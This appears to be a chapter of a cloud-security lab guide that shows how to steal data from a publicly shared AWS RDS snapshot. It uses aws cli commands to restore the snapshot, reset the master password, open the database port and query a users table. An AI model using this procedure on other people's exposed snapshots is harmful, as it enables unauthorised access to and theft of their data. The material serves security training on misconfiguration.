AWS RDS Exploitation via Snapshots

arn:aws:rds:us-east-1:166440625841:snapshot:appsecco-rds-instance-6th-aug-2022

Introduction

AWS RDS allows users to create a storage volume snapshot of their DB instances, backing up the entire DB instance and not just individual databases. The permissions on these snapshots are private by default, but on occasion, users tend to share them publicly to allow for transfer between accounts. The entire database instance can be created from a snapshot, so a misconfigured snapshot permission can potentially provide access to the entire database instance and the data within.

What are we going to cover?

In this chapter we shall see how we can use the aws cli and the Amazon API to restore an RDS snapshot into an instance and then gain access to the data that it contains.

Steps to attack

Stealing from RDS Snapshots

Using the console, navigate to AWS RDS > Snapshots > Public. You can also navigate to this URL to see all public RDS snapshots for the us-east-1 region - https://us-east-1.console.aws.amazon.com/rds/home?region=us-east-1#snapshots-list:tab=public

public snapshot

You can search for any Appsecco snapshots by using the filter textbox.

public snapshot

Once the snapshot is found, let's restore the snapshot as a new instance

But before restoring, make sure you have a default VPC enabled in your AWS account. If not then then run the below command to make one

aws ec2 create-default-vpc

Run the below command to restore the snapshot as a new instance

aws rds restore-db-instance-from-db-snapshot --db-instance-identifier recoverdb --publicly-accessible --db-snapshot-identifier arn:aws:rds:us-east-1:166440625841:snapshot:appsecco-rds-instance-6th-aug-2022 --availability-zone us-east-1b

Once the snapshot is restored, we will check if the instance has been created so that we can connect to it

aws rds describe-db-instances --db-instance-identifier recoverdb

You may have to wait for sometime as the instance is backed up after creation. The status when you run describe-db-instances tells you whether the instance is available or backing-up. The value of "DBInstanceStatus" should read "available".

Finally, we will reset the credentials of the MasterUsername and login into the instance

aws rds modify-db-instance --db-instance-identifier recoverdb --master-user-password NewPassword1 --apply-immediately

This operation also takes some time. You can check the status of the RDS instance by running the aws rds describe-db-instances covered above

Run the following command from the cloudhacker machine to see if the MySQL RDS is up and accessible. Replace the rds-endpoint below with the actual endpoint address.

nc <rds-endpoint> 3306 -zvv

If the endpoint is not visible, then the port 3306 will have to be opened on the Security Group for the instance.

• In RDS console, click on the recoverdb instance

• Click on the Security Group

• Add an Inbound rule for port 3306 TCP for Cloudhacker IP

Connect to the endpoint using the mysql client command

mysql -u <username> -p -h <rds-instance-endpoint>

Once you are connected using the mysql client, you can pilferage data

show databases;
use userdb;
show tables;
select * from users;

Additional references

• AWS cli from DB snapshot

• AWS cli Modify DB Instance

• Restoring from Snapshot